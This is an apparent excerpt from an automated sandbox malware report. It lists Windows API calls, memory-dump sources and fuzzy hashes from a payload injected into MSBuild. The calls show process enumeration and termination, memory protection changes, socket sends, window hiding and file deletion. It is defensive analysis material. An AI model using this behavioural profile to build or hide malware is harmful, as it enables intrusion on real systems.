                                                                                                                                                                                      • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                      • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                      • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                      • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                      • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1170566393-0
                                                                                                                                                                                    • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                                                                                    • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                                                                                                    • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$CloseStop
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3638528417-0
                                                                                                                                                                                    • Opcode ID: cc729f51f58ac3675bc1b090fb4f27c21ae4d46a9f560f09fe8f0373d2393ce3
                                                                                                                                                                                    • Instruction ID: f291f111d3b55938ba5bd66d5a3b5313f014998fb7faa1113fe40cd21bfd9f38
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc729f51f58ac3675bc1b090fb4f27c21ae4d46a9f560f09fe8f0373d2393ce3
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6E04F321181408AC314EB69F855AED77A1EB91305F01447EE40D824B2EB355589EB6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                    • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 00414F49
                                                                                                                                                                                      • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoParametersSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3098949447-0
                                                                                                                                                                                    • Opcode ID: ae2b589f997aa5c72fc3c2106dd714411f1870438bcf880601ba716ac3e97c5c
                                                                                                                                                                                    • Instruction ID: 16af9778d2dab026e44fd182aff3595c44448f688ab1221e4f47f4f5b7710ba8
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae2b589f997aa5c72fc3c2106dd714411f1870438bcf880601ba716ac3e97c5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01043160430086C614FB72D496AEE73E19FD4718F40497FF846A75E2EF38A949C79A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 00415027
                                                                                                                                                                                      • Part of subcall function 0040E6A3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                      • Part of subcall function 0040E6A3: Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                      • Part of subcall function 0040E6A3: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process32$CreateCurrentFirstNextProcessSnapshotToolhelp32send
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 199960123-0
                                                                                                                                                                                    • Opcode ID: 7d37b22ed79db166fac1ecbb96aa7f785b78fd7a87083166bdf0c8386595dcff
                                                                                                                                                                                    • Instruction ID: 38e1ea502710b120ae7c3f9edb738cb9f03b37d5bda28388bee33bdc26f80029
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d37b22ed79db166fac1ecbb96aa7f785b78fd7a87083166bdf0c8386595dcff
                                                                                                                                                                                    • Instruction Fuzzy Hash: B90144726082004BC214F675E896AAEB3E4EBD0304F50483FF945931D1EF789949869A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                                                                                                    • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                                                                                                                                    • Opcode Fuzzy Hash: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,00000000), ref: 004151AA
                                                                                                                                                                                      • Part of subcall function 00416A68: EnumWindows.USER32(Function_00016751,00000000), ref: 00416A80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumTextWindowWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2480600497-0
                                                                                                                                                                                    • Opcode ID: 747c7ca23bad4a1a10c94cee9fb387aed1bdaa77efd33e78d724e030e8ced7dc
                                                                                                                                                                                    • Instruction ID: a8c1eb5ea3412325c7836402fc4d3de0a1ddbf8df3531501c40fc1e27f2746ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 747c7ca23bad4a1a10c94cee9fb387aed1bdaa77efd33e78d724e030e8ced7dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F012315043419AC614FB72D856AFE73A59F90314F40883FB846A60E2EF789949C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                                                                                    • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00415164
                                                                                                                                                                                      • Part of subcall function 0041AD19: OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,0041509E,00000000), ref: 0041AD21
                                                                                                                                                                                      • Part of subcall function 0041AD19: TerminateProcess.KERNEL32(00000000,00000000,?,?,0041509E,00000000), ref: 0041AD2F
                                                                                                                                                                                      • Part of subcall function 0041AD19: CloseHandle.KERNEL32(00000000,?,?,0041509E,00000000), ref: 0041AD3B
                                                                                                                                                                                      • Part of subcall function 00416A68: EnumWindows.USER32(Function_00016751,00000000), ref: 00416A80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseEnumHandleOpenTerminateThreadWindowWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2526979043-0
                                                                                                                                                                                    • Opcode ID: 648fc26301d47bcce6d80af6544e93fc3e0cd09ee4d06a691a7f7435400b9598
                                                                                                                                                                                    • Instruction ID: b05455b57e7b0bef87b9695cb18fe303039b29ce9b6afb21aeb883f1c56ff91e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 648fc26301d47bcce6d80af6544e93fc3e0cd09ee4d06a691a7f7435400b9598
                                                                                                                                                                                    • Instruction Fuzzy Hash: DFF0373114434096C514FBB2D856AFE73A9EF90314F10493FF945930E2DF389955C65A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                    • Opcode ID: 8801704c176822a39b4d6cd667888b303d44f9d2b05b47cb9807332c3350d1bb
                                                                                                                                                                                    • Instruction ID: 478be8ff441214b3a5c9b97e177def518a8b57326db61f46b7c8e0227de354c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8801704c176822a39b4d6cd667888b303d44f9d2b05b47cb9807332c3350d1bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E0923114830096C114FB71E856BFE73A4AF90714F40483FF80A970E2EF789889C29A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                    • Opcode ID: a361d45f3908f1f40e44fe3b5b1926a7a151a7f26019c0223e209ed136dd6559
                                                                                                                                                                                    • Instruction ID: 0034518ddbccc6a27852650da3faa1cedc62a7c2b8847e5fdedca3bed852e860
                                                                                                                                                                                    • Opcode Fuzzy Hash: a361d45f3908f1f40e44fe3b5b1926a7a151a7f26019c0223e209ed136dd6559
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55E0923124830096C114FB71E856BFE73A4AF90714F40483FF80A970E2EF789889C29A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                    • Opcode ID: 2092a9dfdb060fbcb92c6eb666269d72f2d2259a0ad9446492407839e496863b
                                                                                                                                                                                    • Instruction ID: 0be16cab6edacd20e9e571eebac107012cf7170144a05da788fd32dfe1696584
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2092a9dfdb060fbcb92c6eb666269d72f2d2259a0ad9446492407839e496863b
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E0923114830096C114FB71EC56BFE73A4AF90714F40483FF80A970E2EF789889C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                    • Opcode ID: 72be006c6fef3225065798f4425f5b9035b00571656ab388daf18467fb6f8f05
                                                                                                                                                                                    • Instruction ID: 6925553bea9c14164719a3d84184eb848672d29ec3025f6f87dd104ec2ec7084
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72be006c6fef3225065798f4425f5b9035b00571656ab388daf18467fb6f8f05
                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE0483114434096C514FB71E856BFE73A4EF90314F40483FF84A974E2EF789549C699
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseWindow.USER32(00000000), ref: 00415107
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2868366576-0
                                                                                                                                                                                    • Opcode ID: cefe351b4902a629c16a77e74900d8cf095d9daa3fc916039c56a2e56a6947e9
                                                                                                                                                                                    • Instruction ID: 51d836d651f70c7de7d7e96136ec3ff7ad66d234ad1b9695958841da982dd75b
                                                                                                                                                                                    • Opcode Fuzzy Hash: cefe351b4902a629c16a77e74900d8cf095d9daa3fc916039c56a2e56a6947e9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E04F3110824086C614FBB2EC56AFE73A4EF90315F40483FF84A970E2EF389949C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000), ref: 00415715
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                    • Opcode ID: b719ef6b59ec87dbdd425382226ab480a10e0a19536f09fc3559574bb5907df1
                                                                                                                                                                                    • Instruction ID: f382e6b5168fe8f350e331b78b3d6dca2a18559efdd8391db893a32af1609f21
                                                                                                                                                                                    • Opcode Fuzzy Hash: b719ef6b59ec87dbdd425382226ab480a10e0a19536f09fc3559574bb5907df1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDE0E63111824186C614FB71E856BFE73A5EFD0315F40487FF84A974E2EF389949C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Startup
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 724789610-0
                                                                                                                                                                                    • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                    • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: send
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                                                                    • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                    • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Deallocate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1075933841-0
                                                                                                                                                                                    • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                    • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                    • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                    • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00407018
